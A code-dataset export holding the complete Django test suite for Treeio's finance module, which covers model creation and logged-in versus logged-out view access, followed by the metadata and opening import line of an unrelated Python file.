| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
fe9865e2534b8d05a76ed84f98874c21c1a83c81
| 43,149
|
py
|
Python
|
finance/tests.py
|
dynamicguy/treeio
|
4f674898cff2331711639a9b5f6812c874a2cb25
|
[
"MIT"
] | 2
|
2019-02-22T16:02:19.000Z
|
2019-02-23T19:27:34.000Z
|
finance/tests.py
|
dewmal/treeio
|
6299fbe7826800d576f7ab68b4c1996b7194540f
|
[
"MIT"
] | null | null | null |
finance/tests.py
|
dewmal/treeio
|
6299fbe7826800d576f7ab68b4c1996b7194540f
|
[
"MIT"
] | 1
|
2019-02-03T03:54:06.000Z
|
2019-02-03T03:54:06.000Z
|
# encoding: utf-8
# Copyright 2011 Tree.io Limited
# This file is part of Treeio.
# License www.tree.io/license
"""
Finance: test suites
"""
from django.test import TestCase
from django.test.client import Client
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User as DjangoUser
from treeio.core.models import User, Group, Perspective, ModuleSetting, Object
from treeio.finance.models import Transaction, Liability, Category, Account, Equity, Asset, Currency, Tax
from treeio.identities.models import Contact, ContactType
class FinanceModelsTest(TestCase):
"Finance models tests"
def test_model_category(self):
"Test category model"
obj = Category(name='test')
obj.save()
self.assertEquals('test', obj.name)
self.assertNotEquals(obj.id, None)
obj.delete()
def test_model_tax(self):
"Test tax model"
obj = Tax(name='test', rate=10)
obj.save()
self.assertEquals('test', obj.name)
self.assertNotEquals(obj.id, None)
obj.delete()
def test_model_equity(self):
"Test equity model"
contact_type = ContactType(name='test')
contact_type.save()
contact = Contact(name='test', contact_type=contact_type)
contact.save()
obj = Equity(issue_price=10, sell_price=10, issuer=contact, owner=contact)
obj.save()
self.assertNotEquals(obj.id, None)
obj.delete()
def test_model_asset(self):
"Test asset model"
contact_type = ContactType(name='test')
contact_type.save()
contact = Contact(name='test', contact_type=contact_type)
contact.save()
obj = Asset(name='test', owner=contact)
obj.save()
self.assertEquals('test', obj.name)
self.assertNotEquals(obj.id, None)
obj.delete()
def test_model_liability(self):
"Test liability model"
contact_type = ContactType(name='test')
contact_type.save()
contact = Contact(name='test', contact_type=contact_type)
contact.save()
currency = Currency(code="GBP",
name="Pounds",
symbol="L",
is_default=True)
currency.save()
account = Account(name='test', owner=contact, balance_currency=currency)
account.save()
obj = Liability(name='test',
source=contact,
target=contact,
account=account,
value=10,
value_currency=currency)
obj.save()
self.assertEquals('test', obj.name)
self.assertNotEquals(obj.id, None)
obj.delete()
def test_model_account(self):
"Test account model"
contact_type = ContactType(name='test')
contact_type.save()
contact = Contact(name='test', contact_type=contact_type)
contact.save()
currency = Currency(code="GBP",
name="Pounds",
symbol="L",
is_default=True)
currency.save()
obj = Account(name='test', owner=contact,
balance_currency=currency)
obj.save()
self.assertEquals('test', obj.name)
self.assertNotEquals(obj.id, None)
obj.delete()
def test_model_transaction(self):
"Test transaction model"
contact_type = ContactType(name='test')
contact_type.save()
contact = Contact(name='test', contact_type=contact_type)
contact.save()
currency = Currency(code="GBP",
name="Pounds",
symbol="L",
is_default=True)
currency.save()
account = Account(name='test', owner=contact, balance_currency=currency)
account.save()
obj = Transaction(name='test',
account=account,
source=contact,
target=contact,
value=10,
value_currency=currency)
obj.save()
self.assertEquals('test', obj.name)
self.assertNotEquals(obj.id, None)
obj.delete()
class FinanceViewsTest(TestCase):
"Finance functional tests for views"
username = "test"
password = "password"
prepared = False
def setUp(self):
"Initial Setup"
if not self.prepared:
# Clean up first
Object.objects.all().delete()
User.objects.all().delete()
# Create objects
self.group, created = Group.objects.get_or_create(name='test')
duser, created = DjangoUser.objects.get_or_create(username=self.username)
duser.set_password(self.password)
duser.save()
self.user, created = User.objects.get_or_create(user=duser)
self.user.save()
perspective, created = Perspective.objects.get_or_create(name='default')
perspective.set_default_user()
perspective.save()
ModuleSetting.set('default_perspective', perspective.id)
self.contact_type = ContactType(name='test')
self.contact_type.set_default_user()
self.contact_type.save()
self.contact = Contact(name='test', contact_type=self.contact_type)
self.contact.set_default_user()
self.contact.save()
self.category = Category(name='test')
self.category.set_default_user()
self.category.save()
self.equity = Equity(issue_price=10, sell_price=10, issuer=self.contact, owner=self.contact)
self.equity.set_default_user()
self.equity.save()
self.asset = Asset(name='test', owner=self.contact)
self.asset.set_default_user()
self.asset.save()
self.tax = Tax(name='test', rate=10)
self.tax.set_default_user()
self.tax.save()
self.currency = Currency(code="GBP",
name="Pounds",
symbol="L",
is_default=True)
self.currency.set_default_user()
self.currency.save()
self.account = Account(name='test', owner=self.contact, balance_currency=self.currency)
self.account.set_default_user()
self.account.save()
self.liability = Liability(name='test',
source=self.contact,
target=self.contact,
account=self.account,
value=10,
value_currency=self.currency)
self.liability.set_default_user()
self.liability.save()
self.transaction = Transaction(name='test', account=self.account, source=self.contact,
target=self.contact, value=10, value_currency=self.currency)
self.transaction.set_default_user()
self.transaction.save()
self.client = Client()
self.prepared = True
######################################
# Testing views when user is logged in
######################################
def test_finance_login(self):
"Test index page with login at /finance/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance'))
self.assertEquals(response.status_code, 200)
def test_finance_index_login(self):
"Test index page with login at /finance/index/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_index_transactions'))
self.assertEquals(response.status_code, 200)
def test_finance_income(self):
"Test index page with login at /finance/income/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_income_view'))
self.assertEquals(response.status_code, 200)
def test_finance_balance(self):
"Test index page with login at /finance/balance/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_balance_sheet'))
self.assertEquals(response.status_code, 200)
# Account
def test_finance_accounts_index(self):
"Test index page with login at /finance/accounts/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_index_accounts'))
self.assertEquals(response.status_code, 200)
def test_finance_account_add(self):
"Test index page with login at /finance/account/add/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_account_add'))
self.assertEquals(response.status_code, 200)
def test_finance_account_edit(self):
"Test index page with login at /finance/account/edit/<account_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_account_edit', args=[self.account.id]))
self.assertEquals(response.status_code, 200)
def test_finance_account_view(self):
"Test index page with login at /finance/account/view/<account_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_account_view', args=[self.account.id]))
self.assertEquals(response.status_code, 200)
def test_finance_account_delete(self):
"Test index page with login at /finance/account/delete/<account_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_account_delete', args=[self.account.id]))
self.assertEquals(response.status_code, 200)
# Asset
def test_finance_assets_index(self):
"Test index page with login at /finance/assets/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_index_assets'))
self.assertEquals(response.status_code, 200)
def test_finance_asset_add(self):
"Test index page with login at /finance/asset/add/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_asset_add'))
self.assertEquals(response.status_code, 200)
def test_finance_asset_edit(self):
"Test index page with login at /finance/asset/edit/<asset_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_asset_edit', args=[self.asset.id]))
self.assertEquals(response.status_code, 200)
def test_finance_asset_view(self):
"Test index page with login at /finance/asset/view/<asset_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_asset_view', args=[self.asset.id]))
self.assertEquals(response.status_code, 200)
def test_finance_asset_delete(self):
"Test index page with login at /finance/asset/delete/<asset_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_asset_delete', args=[self.asset.id]))
self.assertEquals(response.status_code, 200)
# Equity
def test_finance_equity_index(self):
"Test index page with login at /finance/equity/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_index_equities'))
self.assertEquals(response.status_code, 200)
def test_finance_equity_add(self):
"Test index page with login at /finance/equity/add/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_equity_add'))
self.assertEquals(response.status_code, 200)
def test_finance_equity_edit(self):
"Test index page with login at /finance/equity/edit/<equity_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_equity_edit', args=[self.equity.id]))
self.assertEquals(response.status_code, 200)
def test_finance_equity_view(self):
"Test index page with login at /finance/equity/view/<equity_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_equity_view', args=[self.equity.id]))
self.assertEquals(response.status_code, 200)
def test_finance_equity_delete(self):
"Test index page with login at /finance/equity/delete/<equity_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_equity_delete', args=[self.equity.id]))
self.assertEquals(response.status_code, 200)
# Transaction
def test_finance_transactions_index(self):
"Test index page with login at /finance/transaction/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_index_transactions'))
self.assertEquals(response.status_code, 200)
def test_finance_transaction_add(self):
"Test index page with login at /finance/transaction/add/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_transaction_add'))
self.assertEquals(response.status_code, 200)
def test_finance_transaction_add_liability(self):
"Test index page with login at /finance/transaction/add/liability/(?P<liability_id>\d+)"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_transaction_add', args=[self.liability.id]))
self.assertEquals(response.status_code, 200)
def test_finance_transaction_edit(self):
"Test index page with login at /finance/transaction/edit/<transaction_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_transaction_edit', args=[self.transaction.id]))
self.assertEquals(response.status_code, 200)
def test_finance_transaction_view(self):
"Test index page with login at /finance/transaction/view/<transaction_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_transaction_view', args=[self.transaction.id]))
self.assertEquals(response.status_code, 200)
def test_finance_transaction_delete(self):
"Test index page with login at /finance/transaction/delete/<transaction_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_transaction_delete', args=[self.transaction.id]))
self.assertEquals(response.status_code, 200)
# Liability
def test_finance_liability_index(self):
"Test index page with login at /finance/liability/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_index_liabilities'))
self.assertEquals(response.status_code, 200)
def test_finance_liability_add(self):
"Test index page with login at /finance/liability/add/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_liability_add'))
self.assertEquals(response.status_code, 200)
def test_finance_liability_edit(self):
"Test index page with login at /finance/liability/edit/<liability_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_liability_edit', args=[self.liability.id]))
self.assertEquals(response.status_code, 200)
def test_finance_liability_view(self):
"Test index page with login at /finance/liability/view/<liability_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_liability_view', args=[self.liability.id]))
self.assertEquals(response.status_code, 200)
def test_finance_liability_delete(self):
"Test index page with login at /finance/liability/delete/<liability_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_liability_delete', args=[self.liability.id]))
self.assertEquals(response.status_code, 200)
# Receivables
def test_finance_receivables_index(self):
"Test index page with login at /finance/receivables/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_index_receivables'))
self.assertEquals(response.status_code, 200)
def test_finance_receivable_add(self):
"Test index page with login at /finance/receivable/add/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_receivable_add'))
self.assertEquals(response.status_code, 200)
def test_finance_receivable_edit(self):
"Test index page with login at /finance/receivable/edit/<receivable_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_receivable_edit', args=[self.liability.id]))
self.assertEquals(response.status_code, 200)
def test_finance_receivable_view(self):
"Test index page with login at /finance/receivable/view/<receivable_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_receivable_view', args=[self.liability.id]))
self.assertEquals(response.status_code, 200)
def test_finance_receivable_delete(self):
"Test index page with login at /finance/liability/delete/<receivable_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_receivable_delete', args=[self.liability.id]))
self.assertEquals(response.status_code, 200)
# Category
def test_finance_category_add(self):
"Test index page with login at /finance/category/add/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_category_add'))
self.assertEquals(response.status_code, 200)
def test_finance_category_edit(self):
"Test index page with login at /finance/category/edit/<category_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_category_edit', args=[self.category.id]))
self.assertEquals(response.status_code, 200)
def test_finance_category_view(self):
"Test index page with login at /finance/category/view/<category_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_category_view', args=[self.category.id]))
self.assertEquals(response.status_code, 200)
def test_finance_category_delete(self):
"Test index page with login at /finance/category/delete/<category_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_category_delete', args=[self.category.id]))
self.assertEquals(response.status_code, 200)
# Currency
def test_finance_currency_add(self):
"Test index page with login at /finance/currency/add/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_currency_add'))
self.assertEquals(response.status_code, 200)
def test_finance_currency_edit(self):
"Test index page with login at /finance/currency/edit/<currency_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_currency_edit', args=[self.currency.id]))
self.assertEquals(response.status_code, 200)
def test_finance_currency_view(self):
"Test index page with login at /finance/currency/view/<currency_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_currency_view', args=[self.currency.id]))
self.assertEquals(response.status_code, 200)
def test_finance_currency_delete(self):
"Test index page with login at /finance/currency/delete/<currency_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_currency_delete', args=[self.currency.id]))
self.assertEquals(response.status_code, 200)
# Taxes
def test_finance_tax_add(self):
"Test index page with login at /finance/tax/add/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_tax_add'))
self.assertEquals(response.status_code, 200)
def test_finance_tax_edit(self):
"Test index page with login at /finance/tax/edit/<tax_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_tax_edit', args=[self.tax.id]))
self.assertEquals(response.status_code, 200)
def test_finance_tax_view(self):
"Test index page with login at /finance/tax/view/<tax_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_tax_view', args=[self.tax.id]))
self.assertEquals(response.status_code, 200)
def test_finance_tax_delete(self):
"Test index page with login at /finance/tax/delete/<tax_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_tax_delete', args=[self.tax.id]))
self.assertEquals(response.status_code, 200)
# Settings
def test_finance_settings_view(self):
"Test index page with login at /finance/settings/view/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_settings_view'))
self.assertEquals(response.status_code, 200)
def test_finance_settings_edit(self):
"Test index page with login at /finance/settings/edit/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_settings_edit'))
self.assertEquals(response.status_code, 200)
######################################
# Testing views when user is not logged in
######################################
def test_index(self):
"Test index page at /finance/"
response = self.client.get('/finance/')
# Redirects as unauthenticated
self.assertRedirects(response, reverse('user_login'))
def test_finance_index_out(self):
"Testing /finance/index/"
response = self.client.get(reverse('finance_index_transactions'))
self.assertRedirects(response, reverse('user_login'))
def test_finance_income_out(self):
"Testing /finance/income/"
response = self.client.get(reverse('finance_income_view'))
self.assertRedirects(response, reverse('user_login'))
def test_finance_balance_out(self):
"Testing /finance/balance/"
response = self.client.get(reverse('finance_balance_sheet'))
self.assertRedirects(response, reverse('user_login'))
# Account
def test_finance_accounts_index_out(self):
"Testing /finance/accounts/"
response = self.client.get(reverse('finance_index_accounts'))
self.assertRedirects(response, reverse('user_login'))
def test_finance_account_add_out(self):
"Testing /finance/account/add/"
response = self.client.get(reverse('finance_account_add'))
self.assertRedirects(response, reverse('user_login'))
def test_finance_account_edit_out(self):
"Testing /finance/account/edit/<account_id>"
response = self.client.get(reverse('finance_account_edit', args=[self.account.id]))
self.assertRedirects(response, reverse('user_login'))
def test_finance_account_view_out(self):
"Testing /finance/account/view/<account_id>"
response = self.client.get(reverse('finance_account_view', args=[self.account.id]))
self.assertRedirects(response, reverse('user_login'))
def test_finance_account_delete_out(self):
"Testing /finance/account/delete/<account_id>"
response = self.client.get(reverse('finance_account_delete', args=[self.account.id]))
self.assertRedirects(response, reverse('user_login'))
# Asset
def test_finance_assets_index_out(self):
"Testing /finance/assets/"
response = self.client.get(reverse('finance_index_assets'))
self.assertRedirects(response, reverse('user_login'))
def test_finance_asset_add_out(self):
"Testing /finance/asset/add/"
response = self.client.get(reverse('finance_asset_add'))
self.assertRedirects(response, reverse('user_login'))
def test_finance_asset_edit_out(self):
"Testing /finance/asset/edit/<asset_id>"
response = self.client.get(reverse('finance_asset_edit', args=[self.asset.id]))
self.assertRedirects(response, reverse('user_login'))
def test_finance_asset_view_out(self):
"Testing /finance/asset/view/<asset_id>"
response = self.client.get(reverse('finance_asset_view', args=[self.asset.id]))
self.assertRedirects(response, reverse('user_login'))
def test_finance_asset_delete_out(self):
"Testing /finance/asset/delete/<asset_id>"
response = self.client.get(reverse('finance_asset_delete', args=[self.asset.id]))
self.assertRedirects(response, reverse('user_login'))
# Equity
def test_finance_equity_index_out(self):
"Testing /finance/equity/"
response = self.client.get(reverse('finance_index_equities'))
self.assertRedirects(response, reverse('user_login'))
def test_finance_equity_add_out(self):
"Testing /finance/equity/add/"
response = self.client.get(reverse('finance_equity_add'))
self.assertRedirects(response, reverse('user_login'))
def test_finance_equity_edit_out(self):
"Tesing /finance/equity/edit/<equity_id>"
response = self.client.get(reverse('finance_equity_edit', args=[self.equity.id]))
self.assertRedirects(response, reverse('user_login'))
def test_finance_equity_view_out(self):
"Testing /finance/equity/view/<equity_id>"
response = self.client.get(reverse('finance_equity_view', args=[self.equity.id]))
self.assertRedirects(response, reverse('user_login'))
def test_finance_equity_delete_out(self):
"Testing /finance/equity/delete/<equity_id>"
response = self.client.get(reverse('finance_equity_delete', args=[self.equity.id]))
self.assertRedirects(response, reverse('user_login'))
# Transaction
def test_finance_transactions_index_out(self):
"Testing /finance/transaction/"
response = self.client.get(reverse('finance_index_transactions'))
self.assertRedirects(response, reverse('user_login'))
def test_finance_transaction_add_out(self):
"Testing /finance/transaction/add/"
response = self.client.get(reverse('finance_transaction_add'))
self.assertRedirects(response, reverse('user_login'))
def test_finance_transaction_add_liability_out(self):
"Testing /finance/transaction/add/liability/(?P<liability_id>\d+)"
response = self.client.get(reverse('finance_transaction_add', args=[self.liability.id]))
self.assertRedirects(response, reverse('user_login'))
def test_finance_transaction_edit_out(self):
"Testing /finance/transaction/edit/<transaction_id>"
response = self.client.get(reverse('finance_transaction_edit', args=[self.transaction.id]))
self.assertRedirects(response, reverse('user_login'))
def test_finance_transaction_view_out(self):
"Testing /finance/transaction/view/<transaction_id>"
response = self.client.get(reverse('finance_transaction_view', args=[self.transaction.id]))
self.assertRedirects(response, reverse('user_login'))
def test_finance_transaction_delete_out(self):
"Testing /finance/transaction/delete/<transaction_id>"
response = self.client.get(reverse('finance_transaction_delete', args=[self.transaction.id]))
self.assertRedirects(response, reverse('user_login'))
# Liability
def test_finance_liability_index_out(self):
"Testing /finance/liability/"
response = self.client.get(reverse('finance_index_liabilities'))
self.assertRedirects(response, reverse('user_login'))
def test_finance_liability_add_out(self):
"Testing /finance/liability/add/"
response = self.client.get(reverse('finance_liability_add'))
self.assertRedirects(response, reverse('user_login'))
def test_finance_liability_edit_out(self):
"Testing /finance/liability/edit/<liability_id>"
response = self.client.get(reverse('finance_liability_edit', args=[self.liability.id]))
self.assertRedirects(response, reverse('user_login'))
def test_finance_liability_view_out(self):
"Testing /finance/liability/view/<liability_id>"
response = self.client.get(reverse('finance_liability_view', args=[self.liability.id]))
self.assertRedirects(response, reverse('user_login'))
def test_finance_liability_delete_out(self):
"Testing /finance/liability/delete/<liability_id>"
response = self.client.get(reverse('finance_liability_delete', args=[self.liability.id]))
self.assertRedirects(response, reverse('user_login'))
# Receivables
def test_finance_receivables_index_out(self):
"Testing /finance/receivables/"
response = self.client.get(reverse('finance_index_receivables'))
self.assertRedirects(response, reverse('user_login'))
def test_finance_receivable_add_out(self):
"Testing /finance/receivable/add/"
response = self.client.get(reverse('finance_receivable_add'))
self.assertRedirects(response, reverse('user_login'))
def test_finance_receivable_edit_out(self):
"Testing /finance/receivable/edit/<receivable_id>"
response = self.client.get(reverse('finance_receivable_edit', args=[self.liability.id]))
self.assertRedirects(response, reverse('user_login'))
def test_finance_receivable_view_out(self):
"Testing /finance/receivable/view/<receivable_id>"
response = self.client.get(reverse('finance_receivable_view', args=[self.liability.id]))
self.assertRedirects(response, reverse('user_login'))
def test_finance_receivable_delete_out(self):
"Testing /finance/liability/delete/<receivable_id>"
response = self.client.get(reverse('finance_receivable_delete', args=[self.liability.id]))
self.assertRedirects(response, reverse('user_login'))
# Category
def test_finance_category_add_out(self):
"Testing /finance/category/add/"
response = self.client.get(reverse('finance_category_add'))
self.assertRedirects(response, reverse('user_login'))
def test_finance_category_edit_out(self):
"Testing /finance/category/edit/<category_id>"
response = self.client.get(reverse('finance_category_edit', args=[self.category.id]))
self.assertRedirects(response, reverse('user_login'))
def test_finance_category_view_out(self):
"Testing /finance/category/view/<category_id>"
response = self.client.get(reverse('finance_category_view', args=[self.category.id]))
self.assertRedirects(response, reverse('user_login'))
def test_finance_category_delete_out(self):
"Testing /finance/category/delete/<category_id>"
response = self.client.get(reverse('finance_category_delete', args=[self.category.id]))
self.assertRedirects(response, reverse('user_login'))
# Currency
def test_finance_currency_add_out(self):
"Testing /finance/currency/add/"
response = self.client.get(reverse('finance_currency_add'))
self.assertRedirects(response, reverse('user_login'))
def test_finance_currency_edit_out(self):
"Testing /finance/currency/edit/<currency_id>"
response = self.client.get(reverse('finance_currency_edit', args=[self.currency.id]))
self.assertRedirects(response, reverse('user_login'))
def test_finance_currency_view_out(self):
"Testing /finance/currency/view/<currency_id>"
response = self.client.get(reverse('finance_currency_view', args=[self.currency.id]))
self.assertRedirects(response, reverse('user_login'))
def test_finance_currency_delete_out(self):
"Testing /finance/currency/delete/<currency_id>"
response = self.client.get(reverse('finance_currency_delete', args=[self.currency.id]))
self.assertRedirects(response, reverse('user_login'))
# Taxes
def test_finance_tax_add_out(self):
"Testing /finance/tax/add/"
response = self.client.get(reverse('finance_tax_add'))
self.assertRedirects(response, reverse('user_login'))
def test_finance_tax_edit_out(self):
"Testing /finance/tax/edit/<tax_id>"
response = self.client.get(reverse('finance_tax_edit', args=[self.tax.id]))
self.assertRedirects(response, reverse('user_login'))
def test_finance_tax_view_out(self):
"Testing /finance/tax/view/<tax_id>"
response = self.client.get(reverse('finance_tax_view', args=[self.tax.id]))
self.assertRedirects(response, reverse('user_login'))
def test_finance_tax_delete_out(self):
"Testing /finance/tax/delete/<tax_id>"
response = self.client.get(reverse('finance_tax_delete', args=[self.tax.id]))
self.assertRedirects(response, reverse('user_login'))
# Settings
def test_finance_settings_view_out(self):
"Testing /finance/settings/view/"
response = self.client.get(reverse('finance_settings_view'))
self.assertRedirects(response, reverse('user_login'))
def test_finance_settings_edit_out(self):
"Testing /finance/settings/edit/"
response = self.client.get(reverse('finance_settings_edit'))
self.assertRedirects(response, reverse('user_login'))
| 43.984709
| 105
| 0.611787
| 4,481
| 43,149
| 5.719482
| 0.03102
| 0.057747
| 0.103242
| 0.0803
| 0.918062
| 0.868586
| 0.82551
| 0.820087
| 0.788755
| 0.663116
| 0
| 0.005451
| 0.268766
| 43,149
| 980
| 106
| 44.029592
| 0.806827
| 0.127118
| 0
| 0.595474
| 0
| 0.001414
| 0.217095
| 0.090556
| 0
| 0
| 0
| 0
| 0.226308
| 1
| 0.149929
| false
| 0.072136
| 0.009901
| 0
| 0.166902
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
2298ed5d9c7f6d328f8e685f0d2492ea174690b0
| 12,014
|
py
|
Python
|
All-Operator/3.py
|
Alpha-Demon404/RE-14
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 39
|
2020-02-26T09:44:36.000Z
|
2022-03-23T00:18:25.000Z
|
All-Operator/3.py
|
B4BY-DG/reverse-enginnering
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 15
|
2020-05-14T10:07:26.000Z
|
2022-01-06T02:55:32.000Z
|
All-Operator/3.py
|
B4BY-DG/reverse-enginnering
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 41
|
2020-03-16T22:36:38.000Z
|
2022-03-17T14:47:19.000Z
|
import marshal,zlib,base64
